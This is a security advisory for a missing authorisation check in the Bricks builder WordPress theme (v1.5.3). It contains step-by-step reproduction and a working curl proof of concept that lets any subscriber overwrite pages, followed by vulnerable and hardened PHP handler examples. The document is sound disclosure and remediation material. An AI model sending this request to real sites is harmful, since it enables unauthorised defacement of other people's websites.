The theme does not perform an authorisation check in an AJAX action, which could allow any authenticated user, such as a subscriber, to call it and edit any page, post, or template on the blog.
1. Start with a clean WordPress install
2. Install Bricks builder v1.5.3
3. Enable registrations on the website
4. Register as a new user, log in, and copy the cookies
5. Find a valid postId (e.g. 2, the ID of the "Sample Page" created by default in new WordPress installations)
6. Send the following request to the server:

    curl 'http://example.com/wp-admin/admin-ajax.php' -X POST \
      -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
      -H 'Cookie: INSERT_COOKIES_HERE' \
      --data-raw 'action=bricks_save_post&postId=INSERT_POST_ID_HERE&area=content&nonce=0&content=%5B%7B%22id%22%3A%22aijdog%22%2C%22name%22%3A%22text%2Dbasic%22%2C%22parent%22%3A0%2C%22children%22%3A%5B%5D%2C%22settings%22%3A%7B%22text%22%3A%22Pwned%22%7D%7D%5D'

7. The contents of the page should be replaced with a paragraph reading "Pwned"
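As an added illustration of the bug class (not Bricks' own code, which the advisory does not show), here is the WordPress AJAX handler pattern that lets any logged-in user overwrite any post, beside a hardened form that ties the request to a nonce and to the caller's capability on that specific post; the nonce action name and the meta key are assumed placeholders.

```php
<?php
// Hypothetical illustration of the missing-authorisation pattern; not Bricks' code.
// wp_ajax_* hooks only guarantee that the caller is logged in. The `content`
// parameter in the PoC is a URL-encoded JSON array of builder elements.

// Vulnerable pattern: no nonce check and no capability check for the target post,
// so a subscriber can pass any postId and replace its content.
function insecure_save_post() {
    $post_id = (int) $_POST['postId'];
    $content = wp_unslash($_POST['content']);
    update_post_meta($post_id, '_example_page_content', $content); // assumed meta key
    wp_send_json_success();
}

// Hardened pattern: valid nonce, existing post, per-post capability, parsed input.
function secure_save_post() {
    // A forged value such as nonce=0 fails here and the request dies with 403.
    check_ajax_referer('example-save-post', 'nonce'); // assumed nonce action name

    $post_id = isset($_POST['postId']) ? absint($_POST['postId']) : 0;
    if ($post_id === 0 || get_post($post_id) === null) {
        wp_send_json_error('invalid post', 400);
    }
    // Object-level check: a subscriber does not have edit_post on any page or template.
    if (!current_user_can('edit_post', $post_id)) {
        wp_send_json_error('forbidden', 403);
    }

    $raw      = isset($_POST['content']) ? wp_unslash($_POST['content']) : '';
    $elements = json_decode($raw, true);
    if (!is_array($elements)) {
        wp_send_json_error('malformed content', 400);
    }
    update_post_meta($post_id, '_example_page_content', wp_slash(wp_json_encode($elements)));
    wp_send_json_success();
}
// Only the hardened handler is registered; the insecure one is shown for contrast.
add_action('wp_ajax_bricks_save_post', 'secure_save_post');
```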